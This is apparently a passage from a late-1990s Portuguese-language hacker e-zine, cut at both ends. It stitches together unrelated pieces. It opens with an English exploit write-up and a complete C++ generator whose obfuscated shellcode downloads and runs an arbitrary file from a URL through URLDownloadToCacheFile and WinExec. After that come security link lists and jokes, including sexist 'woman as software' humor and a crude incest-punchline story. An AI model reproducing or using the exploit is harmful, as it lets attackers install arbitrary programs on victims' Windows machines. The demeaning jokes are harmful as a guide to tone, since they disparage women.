ignore what the program is trying to do, and to look at what it's doing. One core idea I've found to be of value is this: One way to get execution onto the stack is to find a way to manipulate our uncorrupted stack. Often you will find a pointer to the stack (or command-line) somewhere not far from the top (of the stack). If it can be moved only a few bytes, or we can conspire to pop more than we push, we can then return to our buffer. Exploit - Intermediate - (Tools: SoftICE/IDA/PSEDIT) ---------------------------------------------------- The overrun we are presented with is only a handfull of bytes, just enough to overwrite one pointer value following the buffer in memory. This pointer, as it turns out, originally points to an array of 1024 pointers, which are either NULL, or point in turn to a 16-byte structure. From context this seems to be a file-handle table of sorts. When I examined the routine (fflush) where we end up referencing the pointer, it turns out that the code iterates thru the 1024 pointers, and for each non-NULL entry, it examines and conditionally changes the 16 byte structure pointed to. It is the change we are interested in. If the structure is represented as: DWORD dw1, dw2, dw3 then the effect of the change is: dw1 = dw3 dw2 = 0 Whilst examining various locations in memory where out exploit string ends up (there are a couple, as the command-line get passed, then parsed), I found one where the following 4k was allocated and 99% zeros. I also found at the top of the stack, about 12 bytes back, a pointer to our exploit string (WinMain lpCmdLine anyone), which was ripe to be copied down 8-bytes to overwrite a return address. Now ideally, if the memory I found was all blank, all I'd need to do would be to arrange for the trailing bytes of my exploit string to point to the appropriate place on the stack. This last DWORD, followed by 1024 DWORD zeros, would serve as a faux handle table which would overwrite a return address with a pointer to our exploit. Are you with me... If not, go back now. In the actual case I found there were indeed 1024 zeros, but there was also one non-zero DWORD directly after my exploit and before the zeros. I needed to remove these values for the table to not crash... so I used the same technique over again to remove it - adding another entry at the top of our table pointing to the offending location neatly removes it, then the second entry does the actual work, and the rest of the table is empty. Done. Complete. Works. Exploit Attached ---------------- I have worked out an exploit which downloads and runs an arbitrary file, and have included the source for a Visual C++ program to create a binary file containing the exploit as a link. Add (for example) an html header and footer, and you have it. Notes: The exploit uses URLDownloadToCacheFile and WinExec. Disassembling the binary file will show you the code (strings have been xor'ed with 0xFADE). Any comments on the exploit code would be appreciated. ------------------------------------------------------------ #include #include #include void Usage( void ) { printf( "Usage: exfact url(40) outfile\n" ); } #define URL_OFFSET 48 unsigned char aSploit[] = { 0x72, 0x6C, 0x6F, 0x67, 0x69, 0x6E, 0x3A, 0x33, 0xDB, 0x3B, 0xDB, 0x74, 0x53, 0xAB, 0x88, 0xB2, 0x97, 0xB1, 0x94, 0xF0, 0x9E, 0xB2, 0x96, 0xDE, 0xAF, 0x8C, 0xB6, 0x9A, 0x95, 0xA9, 0x94, 0xB2, 0x95, 0xBF, 0x9E, 0x8A, 0x95, 0x9D, 0x9B, 0xBD, 0x92, 0xBB, 0xBC, 0xB7, 0x96, 0xBB, 0xBB, 0xDE, 0x9C, 0xAA, 0x8A, 0xE4, 0xC8, 0xEE, 0xC9, 0xF0, 0xC9, 0xEE, 0xD4, 0xEC, 0xCB, 0xEC, 0xD4, 0xEF, 0xCA, 0x82, 0x9B, 0xF0, 0x9F, 0xA6, 0x9F, 0xDE, 0x92, 0xec, 0xc0, 0x9b, 0xb2, 0x66, 0x33, 0x53, 0xb9, 0x61, 0x35, 0xee, 0xd2, 0xae, 0xd4, 0xDE, 0xAD, 0xB7, 0x94, 0x9B, 0x82, 0xBB, 0x99, 0xDE, 0xB3, 0x01, 0xC1, 0xC3, 0x18, 0x8B, 0xD3, 0x8B, 0xF3, 0x66, 0xBA, 0xC0, 0x10, 0x8B, 0x12, 0x66, 0xBB, 0xB8, 0x10, 0x8B, 0x1B, 0x66, 0xBE, 0xC0, 0xC2, 0x8B, 0x36, 0x8B, 0x7C, 0x24, 0x04, 0x33, 0xC9, 0xB1, 0x2F, 0x66, 0x8B, 0x07, 0x66, 0x35, 0xDE, 0xFA, 0x66, 0x89, 0x07, 0x83, 0xC7, 0x02, 0xE0, 0xF1, 0x8B, 0x4C, 0x24, 0x04, 0x83, 0xC1, 0x06, 0x51, 0xFF, 0xD2, 0x8B, 0x4C, 0x24, 0x04, 0x83, 0xC1, 0x11, 0x51, 0x50, 0xFF, 0xD3, 0x8B, 0xD3, 0x8B, 0xD8, 0x8B, 0x4C, 0x24, 0x04, 0x83, 0xC1, 0x51, 0x51, 0x56, 0xFF, 0xD2, 0x8B, 0xF8, 0x8B, 0xEC, 0x81, 0xC4, 0xFF, 0xFB, 0xFF, 0xFF, 0x8B, 0x4D, 0x04, 0x83, 0xC1, 0x29, 0x33, 0xC0, 0x50, 0x50, 0x66, 0xB8, 0xFF, 0x03, 0x50, 0x8B, 0xC5, 0x05, 0xFF, 0xFB, 0xFF, 0xFF, 0x50, 0x51, 0x33, 0xC0, 0x50, 0xFF, 0xD3, 0x8B, 0xDC, 0x33, 0xC0, 0x50, 0x53, 0xFF, 0xD7, 0x33, 0xC0, 0x74, 0xFE, 0x62, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x28, 0x01, 0xB9, 0x20, 0x61, 0x88, 0xFD, 0x56, 0x20, 0x0C, 0x02, 0xB9, 0x20, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0xFC, 0x56, }; int main( int argc, char *argv[] ) { if( argc == 3 ) { DWORD dwURLlen = strlen( argv[ 1 ] )+1; if( dwURLlen < 40 ) { HANDLE h = CreateFile( argv[ 2 ], GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0 ); if ( h == INVALID_HANDLE_VALUE ) { printf( "Error creating %s\n", argv[ 2 ] ); return( 0 ); } DWORD dwWrit = 0; if( !WriteFile( h, aSploit, URL_OFFSET, &dwWrit, NULL ) || ( dwWrit != URL_OFFSET ) ) goto writeerr; for( char *p = argv[ 1 ]; ( *p ) && ( *(p+1) ); p+=2 ) *PWORD( p ) ^= 0xdefa; // 0xfade "little-endian"ed - should use htons? *PWORD( p ) ^= 0xdefa; if( !WriteFile( h, argv[ 1 ], dwURLlen, &dwWrit, NULL ) || ( dwWrit != dwURLlen ) ) goto writeerr; DWORD dwToWrite = sizeof( aSploit ) - ( URL_OFFSET + dwURLlen ); if( !WriteFile( h, &aSploit[ URL_OFFSET+dwURLlen ], dwToWrite, &dwWrit, NULL ) || ( dwWrit != dwToWrite ) ) goto writeerr; CloseHandle( h ); return( 0 ); } } Usage(); return( 1 ); writeerr: printf( "Error writing to %s\n", argv[ 2 ] ); return( 2 ); } ------------------------------------------------------------ P.S. Australian programmer with 19 years experience, C/++, Asm, Delphi, SQL, IP + more, looking for work overseas. Jeremy Kothe (jeremy@edi.com.au or paceflow@hotmail.com) P.P.S. When exposing these type of exploits, it is usual for the coder to launch into a tirade about Microsoft and what terrible software it writes to allow these... I feel that these people are missing the point, though. Microsoft has risen (very successfully) to the challenge of providing a couple of GENERAL PURPOSE, incredibly extensive operating systems for PC's. Anyone who prefers Linux for it's stability etc. should consider the cost (to the average end-user) of such stability. Microsoft have concentrated on the commercial requirements of the corporate Joe, and have written the software people (not jellyheads) need. Of course it would be wonderful if Windows was as solid as secure as a unix installation, but it is simply not the highest priority for the average PC user. LINKS e INFO INTERESSANTE: Pßginas com informaτ⌡es sobre falsos vφrus ou besteira eletr⌠nica: http://ciac.llnl.gov/ciac/CIACHoaxes.html http://www.kumite.com/myths/ http://www.datafellows.com/news/hoax http://www.symantec.com/avcenter/hoax.html Checagem contra Trojans. O Chaosmaker resolveu dar um exemplo de inventividade hacker e fez uma pßgina que permite o sujeito saber se tem algum trojan rodando no seu micro (sem precisar instalar nenhum programa). Veja em http://safescan.safenetworks.com/cgi-bin/safecgi?lang=pt Saiu a ·ltima versπo do BSD http://www.openbsd.org/ Como se livrar do Pretty Park http://vil.nai.com/vil/vpe10175.asp Algumas novidades sobre vφrus de macro e suas variantes: http://www.avpve.com/viruses/worms/bad_ass.html http://vil.nai.com/vil/vm10385.asp http://vil.nai.com/vil/vm10386.asp http://www.zdnet.co.uk/news/specials/1999/03/virus/ O menor webserver do mundo: http://www-ccs.cs.umass.edu/%7Eshri/iPic.html Pßgina sobre o Djgpp na USP: http://www.ime.usp.br/~jose/djgpp Meu compilador favorito agora estß de volta, numa bagagem GNU: http://www.brain.uni-freiburg.de/~klaus/fpc/ Um programinha legal para fazer download de pßginas http://www.ensicaen.ismra.fr/~roche/httrack.html Linux Administration Security Guide - Um guia para administrar a seguranτa do seu site Linux. Nπo precisa gastar grana com livros que vπo ficar obsoletos. Basta acessar http://www.securityportal.com/lasg Versπo em espanhol em: http://segurinet.com/gsal/default.htm Algumas ferramentas ·teis da Adobe, agora disponφveis via email: Conversor de PDF p html via email Pdf2html@adobe.com Conversor de PDF p txt via email Pdf2txt@adobe.com A pßgina onde se pode encontrar isso:http://access.adobe.com/simple_form.html Acho q peguei essas dicas no Jornal da Tarde.. fotos gratuitas (freeware) para sites na web http://www.freefoto.com Site do 007 http://www.007.com Outro site razoavel http://www.defenda-se.inf.br/ Um projeto maluco de um leitor que ainda nπo aprendeu (atΘ ontem) quem meu nome Θ D-E-R-N-E-V-A-L. Mas vale a pena dar uma olhada http://pontobr.br Para quem tem alguma curiosidade sobre como terminou o seriado da CAVERNA DO DRAG├O http://www.mindspring.com/~michaelreaves/D&Dpreface.html http://welcome.to/caverna Esta aqui Θ uma pagina muito doida, muito radical, sobre barulho das armas de fogo.. give peace a chance, man Nemesis Um bug de Internet Information Server http://www.securityfocus.com/templates/archive.pike?list=1&date= 1999-08-8&msg=37B5D87E.D6600553@urban-a.net Subprodutoda confereΩncia do CCC, ocorrida na Alemanha em Agosto. Uma conferΩncia sobre como fazer seu caminho em IT (Information Technology) http://www.computerworld.com/home/news.nsf/all/9908124hackcareers Tem mais hist≤ria sobre a conferΩncia em http://www.computerworld.com/home/news.nsf/all/9908124hackcareers e no http://www.ccc.de Um site que promete: http://www.gamesarmy.cjb.net 5 megas de espaco p. salvar seus trabalhos (eu sei q tem sites oferecendo mais) http://www.filemonkey.com/scripts/t3cgi.exe/filemonkey.taf Um pßgina so' de links sobre discos voadores http://www.eldisco.com/links.cfm Uma Comic-strip legal http://www.userfriendly.org/index.html Museu do mousepad http://www.expa.hvu.nl/ajvdhek/ Anatel AgΩncia Nacional de Telecomunicaτ⌡es - ANATEL - Destaques Um D.O.S (Denial of Service) no http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=549 Um livro de c≤digo da 1a Guerra. Interessante, se vc e' interessado em cripto http://www.cix.co.uk/~klockstone/codebook.htm Alguns links de jogos Um site que fiz com download de material p. fazer joguinhos http://members.xoom.com/fussajogo ReBoots - Jogos On-line http://www.concentric.net/~Reboots http://www.emux.com/ Tudo sobre emuladores http://www.emux.com/ MacGameNews - Jogos de Mac http://www.macgamenews.com ReBoots Guide to Internet Gaming http://www.concentric.net/~Reboots/ MacGameNews.com - Mac game news, reviews, codes and free games http://www.macgamenews.com/ GameStats News Network - Tips and Tricks http://www.gamestats.com/tips/ Jane's Combat Simulations - www.janes.ea.com Jane's Game Demos http://www.janes.ea.com/downloads/demos.html Zine Store http://members.xoom.com/_XMCM/zine_store/menu.htm Links de vigilπncia e paran≤ia (Obs: nπo Θ paran≤ia se estπo realmente te perseguindo): http://www.usnews.com/usnews/issue/970623/23onli.htm http://www.usnews.com/usnews/issue/980511/11mone.htm http://www.redherring.com/mag/issue70/news-privacy.html http://newsweek.com/nw-srv/issue/13_99a/printed/us/st/ty0113_1.htm http://www.nytimes.com/library/cyber/week/061297privacy.html http://webreview.com/pub/1999/06/18/platform/index.html http://demographics.com/publications/mt/97_mt/9705_mt/mt97055.htm ---------------------------------------------------------------------------------------- HUMOR Anos 90 VocΩ ja' teve o bastante dos anos 90 se: 1. VocΩ ja' chegou ao ponto de ter que colocar senha para usar o microondas. 2. Ha' anos voce ja' nao usa cartas de verdade para jogar paciencia. 3. VocΩ pergunta aos seus colegas de trabalho na mesa ao lado via e- mail se alguem esta' a fim de tomar um chope e recebe resposta tambem via e-mail que "tudo bem, me da' so' 5 minutinhos". 4. VocΩ dispoe de 15 numeros de telefone diferentes para se comunicar com os tres membros da sua familia. 5. VocΩ conversa pelo chat varias vezes por dia com um sujeito nos Estados Unidos, mas esse ano ainda nao trocou uma palavra com o vizinho do lado. 6. VocΩ compra um computador novo e uma semana depois ele ja' esta' ultrapassado. 7. O motivo de ter perdido o contato com seus amigos e' que eles nao tem e-mail. 8. VocΩ ja' nao sabe mais quanto custa um selo. 9. Para voce, ser organizado significa ter aqueles adesivos de post-it em diversas cores. 10. A maior parte das piadas que voce conhece recebeu pelo e-mail. 11. VocΩ atende dando o nome da firma onde trabalha, se o telefone toca de noite em casa. 12. VocΩ disca primeiro o zero quando quer telefonar de casa. 13. Ja' faz 4 anos que voce esta' na mesma mesa e, ali mesmo, ja' trabalhou para 3 firmas diferentes. 14. O logo da firma onde voce trabalha muda todo ano para se adequar melhor ao seu novo conceito empresarial 15. VocΩ sai pro trabalho quando ainda esta' escuro e quando volta tambem ja' escureceu. 16. VocΩ tem um programa de configuracao que lhe mostra o numero de dias que faltam ate' a sua aposentadoria. 17. Quando alguem pergunta sua profissao, os seus pais dizem que voce "trabalha com computador". 18. VocΩ so' reconhece os seus filhos gracas 'as fotos em cima da mesa no escritorio. 19. VocΩ foi lendo essa lista e concordando com a cabeca... 20. E agora ja' esta' pensando para quem e' que vai mandar tambem. ---------------------------------------------------------------------------------------- A mulher na informßtica A mulher e a informßtica surgiram na face da Terra em Θpocas bem distintas uma da outra. Mesmo assim, podemos notar que existem muitas semelhanτas entre as duas. Veja a seguir a associaτπo feita entre os tipos de mulheres e o mundo dos computadores: Mulher Compilada: Aquela que sempre funciona em qualquer lugar com qualquer um. Mulher Excel: Dizem que faz muitas coisas mas vocΩ s≤ a utiliza para as quatro operaτ⌡es. Mulher Norton Utilites: Serve apenas para melhorar o seu rendimento ou em caso de total emergΩncia. Mulher USB: Dizem que se conecta com qualquer dispositivo, mas ninguΘm tem. Mulher Ergon⌠mica: ╔ aquela que se adapta αs suas necessidades. Mulher Network: ╔ a que difunde os seus atributos a todas amigas. Mulher Paintbrush: Serve apenas para seus filhos. Mulher RAM: Aquela que esquece o que faz assim que desliga. Mulher Disco Rigido: Aquela que se recorda de tudo o tempo todo. Mulher Windows: Todo mundo sabe que nπo presta mas ninguen vive sem ela. Mulher Encarta: S≤ o Bill Gates tem paciΩncia para agⁿentar por mais de meia hora. Mulher Windows 95: Jß deu problema para 80% da humanidade e continua dando problema para os outros 20%. Mulher Mutimφdia: Faz tudo parecer bonitinho. Mulher GetRight: Serve para vocΩ conseguir outras de forma segura. Mulher ScreenSaver: Nπo serve para nada, mas Θ bonitinha. Mulher Mouse: S≤ funciona quando Θ arrastada e apertada. Mulher Palmtop: Pequena, mas eficiΩnte. Mulher Joystick: Vive deixando vocΩ com a mπo suada e com cπibra no braτo. Mulher Soundblaster: S≤ a voz Θ que presta. Mulher Univac: Velha, grande, meio lerda e esquenta rßpido demais. Mulher DOS: Todos usaram algum dia mas agora ninguΘm quer. Mulher BASIC: Todos usaram algum dia, mas agora ninguΘm com mais de 12 anos de idade aguenta. Mulher AMD: Boa, bonita e mais barata. Mulher Backup: Sempre voτΩ acha que tem mas na hora do "vamo-vΩ" nπo funciona. ---------------------------------------------------------------------------------------- PIADAS DE ENGENHEIROS (Se vocΩ gostou do "como paquerar um Nerd"..) Voce e' um engenheiro (ou pelo menos tem vocacao para isso) se voce responder afirmativamente a aproximadamente 3,287 % das afirmacoes abaixo: - Vc sabe calculo vetorial, mas nao lembra como fazer uma divisao com virgula. - VocΩ tem uma calculadora cientφfica e conhece TODAS as suas funτ⌡es. - Vc ja' usou o AutoCAD para projetar uma pipa para o seu filho. - Vc ja' passou horas realizando o relatorio de um experimento que durou alguns segundos. - Vc tem um bichinho de estimacao com o nome de um grande cientista. - Vc ri de piadas sobre matematicos. - Vc considera qualquer curso nao-cientifico como "facil" ou "sub-curso". - Vc nao entende como algumas pessoas podem achar dificil programar um videocassete. - Vc assistiu "Apollo 13" e achou que os verdadeiros herois foram os caras no "Controle da Missao". - Vc assume que um "cavalo" e' equivalente a uma "ponto no espaco" para facilitar os calculos. - Uma crianca de quatro anos lhe pergunta por que o ceu e' azul e vc tenta explicar toda a teoria da absorcao atmosferica ou do espalhamento eletro-magnetico que um amigo fφsico lhe explicou certa vez. - Vc vai a uma loja de informatica e os vendedores nao conseguem responder suas perguntas. - Vc costuma assobiar a musica tema de "MacGyver". - O que vc mais gosta no Natal e' montar os brinquedos das criancas. - Vc ja' tentou consertar alguma coisa usando elasticos, clipes de papel e fita adesiva. - Seu PC vale mais do que um carro. - Vc pode lembrar de 7 senhas de computador, mas nao da data do aniversario da sua mae. - Vc sabe qual sera' o sentido de rotacao da agua quando puxar a descarga. - Vc esta' sendo processado pela Sociedade Protetora dos Animais por realmente ter realizado o experimento do Gato de Schrodinger. - Vc SABE o que e' o experimento do Gato de Schrodinger. - Vc consegue digitar 70 palavras por minuto, mas nao entende sua propria caligrafia. - Vc ja' abriu alguma coisa "so' para ver como e' por dentro". - Vc guarda pecas de eletrodomesticos estragados. - Vc assiste filmes de ficcao cientifica e fica procurando cenas ou argumentos que estao cientificamente incorretos. - Vc tem o habito de estragar coisas tentando descobrir como elas funcionam. - A maior parte das piadas que vc recebe vem por e-mail. (Peguei na lista piadas-l@listas.ansp.br - Silvia R.G.) Installing Love Can You Install Love? Customer Service Rep: Can you install LOVE? Customer: I can do that. I'm not very technical, but I think I am ready to install now. What do I do first? CS Rep: The first step is to open your HEART. Have you located your HEART ma'am? Customer: Yes I have, but there are several programs running right now. Is it okay to install while they are running? CS Rep: What programs are running ma'am? Customer: Let me see....I have PASTHURT.EXE, LOWESTEEM.EXE, GRUDGE.EXE, and RESENTMENT.COM running right now. CS Rep: No problem. LOVE will automatically erase PASTHURT.EXE from your current operating system. It may remain in your permanent memory, but it will no longer disrupt other programs. LOVE will eventually overwrite LOWESTEEM.EXE with a module of its own called HIGHESTEEM.EXE. However, you have to completely turn off GRUDGE.EXE and RESENTMENT.COM. Those programs prevent LOVE from being properly installed. Can you turn those off ma'am? Customer: I don't know how to turn them off. Can you tell me how? CS Rep: My pleasure. Go to your Start menu and invoke FORGIVENESS.EXE. Do this as many times as necessary until GRUDGE.EXE and RESENTMENT.COM have been completely erased. Customer: Okay, I'm done. LOVE has started installing itself automatically. Is that normal? CS Rep: Yes it is. You should receive a message that says it will reinstall for the life of your HEART. Do you see that message? Customer: Yes I do. Is it completely installed? CS Rep: Yes, but remember that you have only the base program. You need to begin connecting to other HEARTS in order to get the upgrades. Customer: Oops...I have an error message already. What should I do? CS Rep: What does the message say? Customer: It says "ERROR 412 - PROGRAM NOT RUN ON INTERNAL COMPONENTS." What does that mean? CS Rep: Don't worry ma'am, that's a common problem. It means that the LOVE program is set up to run on external HEARTS but has not yet been run on your HEART. It is one of those complicated programming things, but in non-technical terms it means you have to "LOVE" your own machine before it can "LOVE" others. Customer: So what should I do? CS Rep: Can you find the directory called "SELF-ACCEPTANCE"? Customer: Yes, I have it. CS Rep: Excellent, you are getting good at this. Customer: Thank you. CS Rep: You're welcome. Click on the following files and then copy them to the "MYHEART" directory: FORGIVESELF.DOC SELFESTEEM.TXT, REALIZEWORTH.TXT, and GOODNESS.DOC. The system will overwrite any conflicting files and begin patching any faulty programming. Also, you need to delete SELFCRITIC.EXE from all directories, and then empty your recycle bin afterwards to make sure it is completely gone and never comes back. Customer: Got it. Hey! My HEART is filling up with really neat files. SMILE.MPG is playing on my monitor right now and it shows that WARMTH.COM, PEACE.EXE, and CONTENTMENT.COM are copying themselves all over my HEART! CS Rep: Then LOVE is installed and running. You should be able to handle it from here. One more thing before I go... Customer: Yes? CS Rep: LOVE is freeware. Be sure to give it and its various modules to everybody you meet. They will in turn share it with other people and they will return some really neat modules back to you. Customer: I will. Thank you for your help. -------------------------------------------------- COMPREENDENDO OS ENGENHEIROS Compreendendo os Engenheiros ( 1 ) Dois estudantes de engenharia estavam caminhando pelo campus quando um deles disse: -Onde vocΩ conseguiu essa magnφfica bicicleta ? O segundo respondeu: -Bem, eu estava caminhando por aφ ontem, pensando em meus trabalhos, quando apareceu uma formosa mulher com esta bicicleta. Atirou a bicicleta ao solo,tirou toda a sua roupa e disse: "Pega o que quiser". O primeiro engenheiro acenou afirmativamente: -Boa escolha! A roupa provavelmente nπo teria servido para vocΩ!". * * * Compreendendo os Engenheiros ( 2 ) Um arquiteto, um artista e um engenheiro estavam discutindo se era melhor passar o tempo com a mulher ou com a amante. O arquiteto disse que gostava de passar o tempo com sua mulher, construindo uma base s≤lida para uma relaτπo duradoura. O artista disse que gostava de passar o tempo com sua amante, porque com ela encontrava paixπo e mistΘrio. O engenheiro disse: - Eu gosto das duas -As duas?! -Sim. Se tens uma mulher e uma amante, cada uma delas acha que vocΩ estß passando o tempo com a outra, e vocΩ poder ir para a empresa terminar o trabalho! * * * Compreendendo os Engenheiros ( 3 ) Qual a diferenτa entre os engenheiros e os arquitetos? Os engenheiros constroem armas, os arquitetos construem alvos. * * * Compreendendo os Engenheiros ( 4 ) Para o otimista, o copo estß meio cheio. Para o pessimista, o copo estß meio vazio. Para o engenheiro, o copo estß duas vezes maior do que deveria ser. * * * Compreendendo os Engenheiros (5) Um engenheiro estava atravessando uma estrada um dia, quando um sapo o chamou e lhe disse: -Se me beijar, me transformarei em uma formosa princesa. O engenheiro se inclinou, pegou o sapo e o p⌠s no bolso. O sapo voltou a falar, e disse: -Se me beijar para que me transforme em uma formosa princesa, ficarei com vocΩ durante uma semana. O engenheiro tirou o sapo do bolso, sorriu para ele e voltou a p⌠-lo no bolso. Entπo o sapo gritou: -Se me beijar eu me transformarei em uma formosa princesa, ficarei com vocΩ e farei tudo o que quiser. Outra vez o engenheiro pegou o sapo, sorriu para ele e o p⌠s de novo no bolso. Finalmente o sapo perguntou: -O que Θ que estß acontecendo? Eu disse que sou uma formosa princesa, que ficarei com vocΩ por uma semana e farei tudo o que quiser. Por que vocΩ nπo me beija? O engenheiro disse: -Veja, eu sou um engenheiro. Nπo tenho tempo para namoradas, mas um sapo que fala, isso sim Θ interessante !! -------------------------------------------------- Namoro na Net Certa jovem universitßria que prefere manter-se inc≤gnita, a quem chamaremos de Jill, estava cursando a faculdade de ciΩncia da computaτπo numa universidade nos EUA. Para quem conhece a vida universitßria americana, o dia-a- dia de um estudante consiste de um pouco de estudo e de *muita* festanτa e gandaia. O caso de Jill nπo era diferente, sempre correndo atrßs de suas obrigaτ⌡es acadΩmicas, mas com as antenas ligadonas na vida selvagem que curtia com os amigos. Mas nπo se podia falar mal de Jill, que tambΘm era fera em computaτπo. Nπo era sem esforτo que conseguia brilhar nos estudos. Quando nπo estava se divertindo, enfiava a cara pra valer nos trabalhos e ralava pesado projetando programas, escrevendo c≤digo e instalando software. Certa feita, poucos dias depois de ter rompido com um namorado, estava a nossa Jill em casa numa sexta α noite. Era a primeira vez em trΩs anos que se via livre nesse dia sagrado da semana, pois normalmente estaria com o namorado. Era normal que se sentisse no maior baixo-astral. Para encher o tempo e afastar o fantasma da saudade, decidiu fazer uma nova home page. Lß pelas tantas, depois de algumas horas de links e tabelas, cansou-se daquilo e entrou numa sala de chat para relaxar um pouco. Sendo uma menina fogosa e ainda curtindo a dor de cotovelo, optou por um chat de sexo e comeτou a brincar com quem estava on-line. Foi quando tudo comeτou. Jill conheceu um camarada no chat chamado Mike. Claro que nπo era o nome verdadeiro dele. Obviamente ela tambΘm nπo disse seu nome real: optou por se chamar "Nancy". Comeτaram os dois a brincar com aquele jogo excitante da fantasia, entrando em minuciosos detalhes sobre o que fariam se estivessem juntos em algum lugar sossegado, α meia luz. ╔ desnecessßrio dizer o quπo alto podem voar duas pessoas envolvidas em chats desse tipo. ╔ o que se chama de ciber-sexo e, se os parceiros virtuais forem hßbeis no manejo do teclado e conseguirem se soltar razoavelmente na linguagem escrita, o resultado pode ser incrivelmente prazeiroso. A coisa pegou fogo e alguns minutos mais tarde estavam se despedindo, concordando em se encontrarem no dia seguinte. Chegou a noite de sßbado e lß estavam eles, provocando-se novamente. Aproximaram-se ainda mais nessa segunda tentativa e os encontros virtuais foram se repetindo. Acabaram papeando on-line a semana toda, sempre terminando a conversa com erupτ⌡es vulcΓnicas, terremotos e tornados. Na outra segunda-feira, o col≤quio se desviou para assuntos mais φntimos, desta vez aproximando-os como pessoas, fazendo com que compartilhassem quest⌡es particulares e sentimentos. Os dois sentiam suas almas cada vez mais pr≤ximas, suas vidas se entrelaτando e a relaτπo se tornando mais intensa e complexa. Jill nπo queria revelar que era uma universitßria em inφcio de curso, pois temia que Mike a achasse imatura. Sentiu-se meio culpada, mas superou essa fase, passando a gostar cada vez mais do Mike que parecia um cara fascinante, vivido e agradßvel. Os e-mails que trocavam eram apaixonados e inflamßveis. A troca de energias prolongou-se por meses, atΘ que comemoraram um ano desde o primeiro chat. Jß haviam contado seus pensamentos mais secretos e, mesmo assim, nunca trocaram fotos nem tiveram coragem de falar ao telefone. Morriam de medo de destruir o clima de mistΘrio. Haviam feito tudo que era sexualmente possφvel via Internet, mas nπo sem um profundo afeto. Era natural que passassem a ansiar por um encontro fφsico, real. Num belo dia, os dois decidiram que era hora de se conhecerem. Estavam se amando e nπo se importavam com idade, aparΩncia fφsica, coisa nenhuma. Queriam apenas um ao outro, loucamente. Mike disse a Jill que ela poderia atΘ ser sua pr≤xima esposa. Ela ficou meio assustada a princφpio. E se ele fosse velho? E se fosse feio? Ora, que se dane. Ela o amava e isso bastava. Era o ·nico cara com quem se sentia confortßvel. Planejaram entπo uma viagem para uma cidade do interior, onde passariam um fim-de-semana juntos. Ia ser o mßximo! Imagine a leitora o friozinho na barriga que os dois sentiam s≤ em pensar no encontro. Jill nπo queria o trabalho de ter que reconhecer o Mike, portanto pediu a ele que agitasse um aposento num hotel e eles se encontrariam direto no quarto. Mike topou no ato. No dia aprazado, a nervosa Jill chegou, apresentou-se como Nancy α recepcionista e foi se instalar no quarto reservado pelo Mike, que chegaria em alguns minutos. Entrou no quarto, inspecionou as instalaτ⌡es e p⌠s-se a preparar um ambiente romΓntico e especial para a ocasiπo. Acendeu velas perfumadas, ligou um som gostoso, tirou a roupa e deitou na cama, para fazer uma surpresa para o amado. Quando ele chegou, meteu a chave na porta com cuidado e chamou sussurrando: "Nancy!". Ela, emocionada, respondeu, quase sem ar: "Mike, estou aqui". Ele apalpou a parede junto α porta em busca do interruptor, acendeu a luz e viu Jill nua sobre a cama. O que se ouviu depois naquele hotel foram dois gritos lancinantes, um grosso e outro esganiτado. Jill cobriu-se imediatamente e, com sua voz mais humilhada, disse ofegante e pasma: "Papaai!" (Luis C) --------------------------------------------- >> Um analista de sistemas meio introvertido finalmente conseguiu realizar o >> sonho da sua vida: um cruzeiro. Estava comeτando a desfrutar da viagem >> quando um furacπo virou o navio como se fosse uma caixa de f≤sforos. O >> rapaz conseguiu agarrar-se a um salva-vidas e chegar a uma ilha >> aparentemente deserta e muito escondida. Deparou com uma cena belφssima: >> cachoeira, bananas, coqueiros... mas quase nada alΘm disso. Ele se sentiu >> desesperado e completamente abandonado. >> Vßrios meses se passaram e um belo dia apareceu, remando, uma belφssima >> moτa, mistura de Sharon Stone com Cindy Crawford. A moτa comeτou uma >> conversa: >> * Eu sou do outro lado da ilha. VocΩ tambΘm estava no cruzeiro? >> * Estava! Mas onde conseguiu esse bote? >> * Simples! Tirei alguns galhos de ßrvores, sangrei alguma borracha, >> reforcei os galhos, fiz a quilha e os remos com madeira de eucalipto. >> * Mas... com que ferramentas? >> * Bom, achei uma camada de material rochoso, evidentemente formada por >> aluvi⌡es. Eu descobri que esquentando este material a uma certa >> temperatura, ele assumia uma forma muito maleßvel. >> Mas chega disso! Onde vocΩ tem vivido esse tempo todo? Nπo vejo nada >> parecido com um teto... >> * Para ser franco, eu tenho dormido na praia... >> * Quer vir a minha casa? >> * O analista de 